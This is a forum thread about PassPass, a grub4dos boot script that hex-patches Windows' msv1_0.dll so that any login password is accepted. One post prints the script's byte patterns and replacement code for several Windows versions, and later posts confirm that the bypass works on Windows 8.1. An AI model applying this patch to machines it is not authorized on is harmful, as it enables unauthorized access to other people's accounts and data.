Jump to content











Photo
* * * * - 2 votes

PassPass - Bypass the Password


  • Please log in to reply
383 replies to this topic

#251 steve6375

steve6375

    Platinum Member

  • Developer
  • 6828 posts
  • Location:UK
  • Interests:computers, programming (masm,vb6,C,vbs), photography,TV,films,guitars, www.easy2boot.com
  •  
    United Kingdom

Posted 02 September 2014 - 04:58 PM

or  PIN entry or picture entry generates a 'pseudo-password' which is then checked by the dll??? The code that is patched compares two strings.



#252 Holmes.Sherlock

Holmes.Sherlock

    Gold Member

  • Team Reboot
  • 1444 posts
  • Location:Santa Barbara, California
  •  
    United States

Posted 02 September 2014 - 04:58 PM

It means 'msv1_0.dll' is the file which hold all type of log-in password entries (password entry, PIN entry and picture entry) ?

 

It doesn't contain passwords, but the password check routine MsvppasswordValidate()

 

The script tries to locate all existing Windows installations and corresponding Windows editions as well. Thereafter, it replaces the CMP instruction responsible for password verification with a 'benign' sequence of bytes. For reverting back the changes, the process is just the opposite. The whole idea is derived from WindowsGate and Astr0baby's tutorial.



#253 steve6375

steve6375

    Platinum Member

  • Developer
  • 6828 posts
  • Location:UK
  • Interests:computers, programming (masm,vb6,C,vbs), photography,TV,films,guitars, www.easy2boot.com
  •  
    United Kingdom

Posted 02 September 2014 - 06:58 PM

E2B version 1.5 (bug fix in menu - did not return to Main menu if no Windows files found)

 

Attached Files



#254 knjor

knjor
  • Members
  • 8 posts
  •  
    Egypt

Posted 09 September 2014 - 08:16 PM

E2B version 1.5 (bug fix in menu - did not return to Main menu if no Windows files found)

hi steve

 

is this the last update for windows 8.1



#255 steve6375

steve6375

    Platinum Member

  • Developer
  • 6828 posts
  • Location:UK
  • Interests:computers, programming (masm,vb6,C,vbs), photography,TV,films,guitars, www.easy2boot.com
  •  
    United Kingdom

Posted 09 September 2014 - 08:41 PM

Yes - I think it all works...



#256 boulcat

boulcat

    Member

  • Advanced user
  • 51 posts
  •  
    Belgium

Posted 12 September 2014 - 09:40 AM

I discover, I'll try as soon as possible in VM :)
To save time, what is the risk to use it without backup in a real computer ? 
Grub4dos, how to make passpass works with UEFI ?
Based on it, is there a possibility to patch msv1_0.dll with a program in a WinPE ?


#257 steve6375

steve6375

    Platinum Member

  • Developer
  • 6828 posts
  • Location:UK
  • Interests:computers, programming (masm,vb6,C,vbs), photography,TV,films,guitars, www.easy2boot.com
  •  
    United Kingdom

Posted 12 September 2014 - 09:55 AM

You can try on a real computer, just make a backup of the dll first.

It can also mess up other account passwords when you login again after restoring the dll and you may have to enter passwords etc. again for some accounts e.g. Dropbox, etc. which is a bit of a nuisance.

 

UEFI is not supported as grub4dos only boots in MBR mode. You could try booting in MBR mode - modify the the DLL and then reboot from the internal HDD in UEFI mode. I am not sure if grub4dos works with GPT partitions though...



#258 Wonko the Sane

Wonko the Sane

    The Finder

  • Advanced user
  • 14520 posts
  • Location:The Outside of the Asylum (gate is closed)
  •  
    Italy

Posted 12 September 2014 - 10:36 AM

 

Based on it, is there a possibility to patch msv1_0.dll with a program in a WinPE ?

 

Sure, it is just a hex patch, you can do it also from DOS (if you have a NTFS dos driver if th etarget is NTFS), or from a Linux for that matters.

The use of grub4dos is just a (small, compact, effective) choice.

 

 

 I am not sure if grub4dos works with GPT partitions though...

Sure it does (latest versions, at least).

 

:duff:

Wonko



#259 boulcat

boulcat

    Member

  • Advanced user
  • 51 posts
  •  
    Belgium

Posted 12 September 2014 - 01:32 PM

UEFI is not supported as grub4dos only boots in MBR mode. You could try booting in MBR mode - modify the the DLL and then reboot from the internal HDD in UEFI mode.

 

You mean by disabling the secure boot and with the CSM.
About the backup of the dll first (.bak), if it is safer, is it possible to add it in toPassPass.g4b ? 
 

Sure, it is just a hex patch, you can do it also from DOS (if you have a NTFS dos driver if th etarget is NTFS), or from a Linux for that matters.

 

I do not know how to do with Dos. I think at gsar or AutoIT.
May I do ask, if you can share, pm  :unsure:, you have spend time on it ;) The md5 or others of dlls to check the version (XP->8.1, x86/x64) with the hex codes to change, offset. I can maybe try, next week, with my notions in AutoIT. 
 
:)


#260 Wonko the Sane

Wonko the Sane

    The Finder

  • Advanced user
  • 14520 posts
  • Location:The Outside of the Asylum (gate is closed)
  •  
    Italy

Posted 12 September 2014 - 02:21 PM

The PassPass is scripted in grub4dos batch, which is like 99% similar to common Dos/Windows batch.
i.e. it is more or less "plain English".
With all due respect :), if you cannot read a batch script, you cannot write a script in Autoit.
Additionally the script is clearly commented.
 
The script does essentially two things:
  • detects the version of .dll in the system that one wants to patch
  • patches the .dll with the correct pattern (which may depend on the specific .dll version detected)
Once the version has been established, it is - as said -  a simple hex patch, gsar might do:
Snippet from PassPass v1.1 (the one that Holmes.Sherlock failed to update with the new findings)
:32BitPatch
set patt=\x83\xF8\x10
set rpatt=\x33\xC0\x90
if "%majmin%"=="6.2" set patt=\x3B\xC6\x75\x13 && set rpatt=\x33\xC0\x75\x13
goto :DoPatch

:64BitPatch
set patt=\x48\x3B\xC6\x0F\x85
set rpatt=\x33\xC0\x90\x0F\x85
if "%majmin%"=="6.2" set patt=\x49\x3B\xC6\x0F\x85 && set rpatt=\x33\xC0\x90\x0F\x85

:DoPatch
:: Check whether we can unpatch
cat --locate=%rpatt% --number=1 %dllPath% > nul
if "%@retval%"=="1" goto :warnUserP
cat --hex --locate=%patt% --replace=%rpatt% %dllPath% > nul
if "%@retval%"=="0" goto :warnUserP
echo DLL at %dllPath% patched
goto :EOF
Snippet from Steve6375's latest version (in which the script is modified to work with Easy2boot setup, and with added needless warnings, but the "essential part" doesn't change):
:32BitPatch
set patt=\x83\xF8\x10
set rpatt=\x33\xC0\x90
if "%majmin%"=="6.2" set patt=\x3b\xc6\x75\x13 && set rpatt=\x33\xc0\x75\x13
if "%majmin%"=="6.3" set patt=\x4d\x3b\xc6\x0F\x85 && set rpatt=\x4d\x33\xc0\x0F\x85
echo 32-Bit Win%majmin% - Patch bytes %patt% with %rpatt%

:DoPatch
:: check we can unpatch
cat --locate=%rpatt% %dllPath% > nul
if not "%@retval%"=="0" goto :warnUser

cat --locate=%patt% %dllPath% > %tmpmem%
set n1=%@retval%
if %n1%==0 goto :warnUser
set ask=
if %n1%>=2 set /p /u ask=WARNING: %n1% instances found in %file%! Press S to skip : 
if not "%ask%"=="S" cat --hex --locate=%patt% --replace=%rpatt% %dllPath% > nul 
set r=%@retval%
if "%ask%"=="S" echo -e \n\n User aborted - press a key... && goto :EOF
if "%n1%"=="0" goto :warnUser
goto :patchMessage

:64BitPatch
set patt=\x48\x3B\xC6\x0F\x85
set rpatt=\x33\xC0\x90\x0F\x85

if "%majmin%"=="6.2" set patt=\x49\x3B\xC6\x0F\x85 && set rpatt=\x33\xC0\x90\x0F\x85
if "%majmin%"=="6.3" set patt=\x49\x3B\xC6\x0F\x85 && set rpatt=\x33\xC0\x90\x0F\x85
echo 64-Bit Win%majmin% - Patch bytes %patt% with %rpatt%
goto :DoPatch

But the whole point (if you want the only "elegant" part in the approach) is that by having this internal to grub4dos you:
  • boot to grub4dos
  • patch the file
  • continue booting to the "resident" patched Windows install
as opposed to:
  • boot *some other* OS
  • patch the file
  • reboot, booting this time to the "resident" patched Windows install
The (as usual half-@§§ed ;) but seemingly effective) .dll version detection method is also - by itself - posted here:
http://reboot.pro/to...nd-dll-version/
though a "highish level" scripting language like AutoIT running in a PE has most probably a better built-in method/command/whatever for this.
 
:duff:
Wonko

#261 steve6375

steve6375

    Platinum Member

  • Developer
  • 6828 posts
  • Location:UK
  • Interests:computers, programming (masm,vb6,C,vbs), photography,TV,films,guitars, www.easy2boot.com
  •  
    United Kingdom

Posted 12 September 2014 - 02:35 PM

 

You mean by disabling the secure boot and with the CSM.
About the backup of the dll first (.bak), if it is safer, is it possible to add it in toPassPass.g4b ? 

 

In the E2B version (not sure about SH PassPass), the option to backup the dll is already in the menu.



#262 Holmes.Sherlock

Holmes.Sherlock

    Gold Member

  • Team Reboot
  • 1444 posts
  • Location:Santa Barbara, California
  •  
    United States

Posted 12 September 2014 - 02:39 PM

In the E2B version (not sure about SH PassPass), the option to backup the dll is already in the menu.

 

It's there in SH & WTS PassPass, too

 

Snippet from PassPass v1.1 (the one that Holmes.Sherlock failed to update with the new findings)

 

I do have some kinda issue with the word highlighted. Unlike Italian freelance, Indian students guys have something called 'real-life commitments'. 



#263 boulcat

boulcat

    Member

  • Advanced user
  • 51 posts
  •  
    Belgium

Posted 12 September 2014 - 02:47 PM

The PassPass is scripted in grub4dos batch, which is like 99% similar to common Dos/Windows batch.

 
The batch is certainly enough, Thanks a lot :)
I'll try to test with Grub4dos and with your batch, next week. I would see for Autoit.

 

In the E2B version (not sure about SH PassPass), the option to backup the dll is already in the menu.

 

Good, I have not tried E2B yet. In a first time, I'll try with SH PassPass,

Homes Sherlock could say for  the dll backup.

 

But the whole point (if you want the only "elegant" part in the approach) is that by having this internal to grub4dos you:

  • boot to grub4dos
  • patch the file
  • continue booting to the "resident" patched Windows install

 

 

Indeed. I'm not familiar with UEFI and I know my WinPE starts, so it is nice to have the batch too.

:)


Edited by boulcat, 12 September 2014 - 03:00 PM.


#264 Wonko the Sane

Wonko the Sane

    The Finder

  • Advanced user
  • 14520 posts
  • Location:The Outside of the Asylum (gate is closed)
  •  
    Italy

Posted 12 September 2014 - 03:21 PM

I do have some kinda issue with the word highlighted. Unlike Italian freelance, Indian students guys have something called 'real-life commitments'.

Sure, noone said that you hadn't your perfectly valid reasons to fail to upgrade the PassPass :), and noone said that you should have done it (though you should actually have done it :whistling:), I am perfectly aware of the gargantuan[1] amount of work and time involved in adding 2 (two) lines to a script.

 

:duff:

Wonko 

 

[1]

You know, I've always liked that word... "gargantuan"... so rarely have an opportunity to use it in a sentence.

 

http://www.imdb.com/...?item=qt0335291



#265 boulcat

boulcat

    Member

  • Advanced user
  • 51 posts
  •  
    Belgium

Posted 12 September 2014 - 03:31 PM

 

 

In the E2B version (not sure about SH PassPass), the option to backup the dll is already in the menu.

 

 
It's there in SH & WTS PassPass, too

 

 

 

I missed your answer, thank to you 3 :)



#266 Holmes.Sherlock

Holmes.Sherlock

    Gold Member

  • Team Reboot
  • 1444 posts
  • Location:Santa Barbara, California
  •  
    United States

Posted 12 September 2014 - 04:05 PM

Sure, noone said that you hadn't your perfectly valid reasons to fail to upgrade the PassPass :), and noone said that you should have done it (though you should actually have done it :whistling:), I am perfectly aware of the gargantuan[1] amount of work and time involved in adding 2 (two) lines to a script.

 

I prefer to fight with people who are 'sane' enough to understand real-life calls.

 

PassPass v1.2 with added support for Windows 8.1, both 32-bit and 64 bit (Credit to Steve for the patch supplied) has been published on my blog.

 

This version includes a floppy image for a quick testing (to be mounted by Imdisk or other similar tools) for those who want to gain confidence by trying it out on virtual machine before applying patch to live system.



#267 Wonko the Sane

Wonko the Sane

    The Finder

  • Advanced user
  • 14520 posts
  • Location:The Outside of the Asylum (gate is closed)
  •  
    Italy

Posted 12 September 2014 - 04:15 PM

PassPass v1.2 with added support for Windows 8.1, both 32-bit and 64 bit (Credit to Steve for the patch supplied) has been published on my blog.

 

Very good. :)

 

And I would say that it was quick :thumbsup: (even if possibly not timely ;))

 

:duff:

Wonko



#268 boulcat

boulcat

    Member

  • Advanced user
  • 51 posts
  •  
    Belgium

Posted 12 September 2014 - 08:51 PM

I tested PassPass v1.2 with Widows 8.1 x64 in VM
DLL at (hd0,1)/Windows/System32/msv1_0.dll patched
Reboot, the password is well bypassed
 
DLL at (hd0,1)/Windows/System32/msv1_0.dll unpatched
Reboot, the old password is again required
 
Just domage that there is no back to Grub4DOS after the message.
 
I added PassPass to my toolbox, Great  :good:
 
 
A small issue however with option backup msv1_0.dll
 
MuspVQH.jpg


#269 steve6375

steve6375

    Platinum Member

  • Developer
  • 6828 posts
  • Location:UK
  • Interests:computers, programming (masm,vb6,C,vbs), photography,TV,films,guitars, www.easy2boot.com
  •  
    United Kingdom

Posted 12 September 2014 - 09:48 PM

What version of grub4dos do you have? 



#270 boulcat

boulcat

    Member

  • Advanced user
  • 51 posts
  •  
    Belgium

Posted 12 September 2014 - 09:58 PM

I use grub4dos-0.4.5c-2013-10-30



#271 steve6375

steve6375

    Platinum Member

  • Developer
  • 6828 posts
  • Location:UK
  • Interests:computers, programming (masm,vb6,C,vbs), photography,TV,films,guitars, www.easy2boot.com
  •  
    United Kingdom

Posted 12 September 2014 - 09:59 PM

Try 2014-08-17 version 0.4.5c

http://grub4dos.chen...ries/downloads/



#272 boulcat

boulcat

    Member

  • Advanced user
  • 51 posts
  •  
    Belgium

Posted 12 September 2014 - 10:24 PM

Done but same issue with 2014-08-17 ! 

I saw in the Readme: Script tested with Grub4DOS v0.4.5c-2013-03-03 !

To continue testing if needed, it will be Monday or Tuesday, I leave for the WE, see you :)



#273 boulcat

boulcat

    Member

  • Advanced user
  • 51 posts
  •  
    Belgium

Posted 12 September 2014 - 10:50 PM

Another little trick, after patching, nothing happen here in VM with the option 'Boot from internal HDD '.
Patch, unpatch is great, no rush ;)
 
Edit: If I replace 
if "%?_BOOT:~0,3%"=="(hd" map (hd0) (hd1)
if "%?_BOOT:~0,3%"=="(hd" map (hd1) (hd0)
if "%?_BOOT:~0,3%"=="(hd" map --hook
chainloader (hd0)+1

by

rootnoverify (hd0)
chainloader +1

It's OK, the initial cmd is for USB?

 

Edited by boulcat, 12 September 2014 - 11:09 PM.


#274 tinybit

tinybit

    Gold Member

  • Developer
  • 1102 posts
  •  
    China

Posted 13 September 2014 - 03:16 AM



 

Another little trick, after patching, nothing happen here in VM with the option 'Boot from internal HDD '.
Patch, unpatch is great, no rush ;)
 
Edit: If I replace 

if "%?_BOOT:~0,3%"=="(hd" map (hd0) (hd1)
if "%?_BOOT:~0,3%"=="(hd" map (hd1) (hd0)
if "%?_BOOT:~0,3%"=="(hd" map --hook
chainloader (hd0)+1

by




rootnoverify (hd0)
chainloader +1

It's OK, the initial cmd is for USB?

 

 

 

 

Generally, the correct usage of  "chainloading a 512-byte boot sector" should be:

 

1.  Set the current root device by "root", "rootnoverify" or "find --set-root" or any other means.

2.  chainloader THE_BOOT_SECTOR

3.  boot

 

or equivalently

 

1.  chainloader THE_BOOT_SECTOR

2.  Set the current root device by "root", "rootnoverify" or "find --set-root" or any other means.

3.  boot

 

Note that the boot command needs to pass DL register with the drive number of the root drive, just before it transfer control to the boot sector.

 

So the following usage

 

if "%?_BOOT:~0,3%"=="(hd" map (hd0) (hd1)
if "%?_BOOT:~0,3%"=="(hd" map (hd1) (hd0)
if "%?_BOOT:~0,3%"=="(hd" map --hook
chainloader (hd0)+1

 

is wrong, because the root is unknown or undetermined or unexpected.



#275 Holmes.Sherlock

Holmes.Sherlock

    Gold Member

  • Team Reboot
  • 1444 posts
  • Location:Santa Barbara, California
  •  
    United States

Posted 13 September 2014 - 05:17 AM

if "%?_BOOT:~0,3%"=="(hd" map (hd0) (hd1)
if "%?_BOOT:~0,3%"=="(hd" map (hd1) (hd0)
if "%?_BOOT:~0,3%"=="(hd" map --hook
rootnoverify (hd0)
chainloader (hd0)+1

Is it correct?

 

BTW, in my VM simulation, earlier piece of code works fine, too.






0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users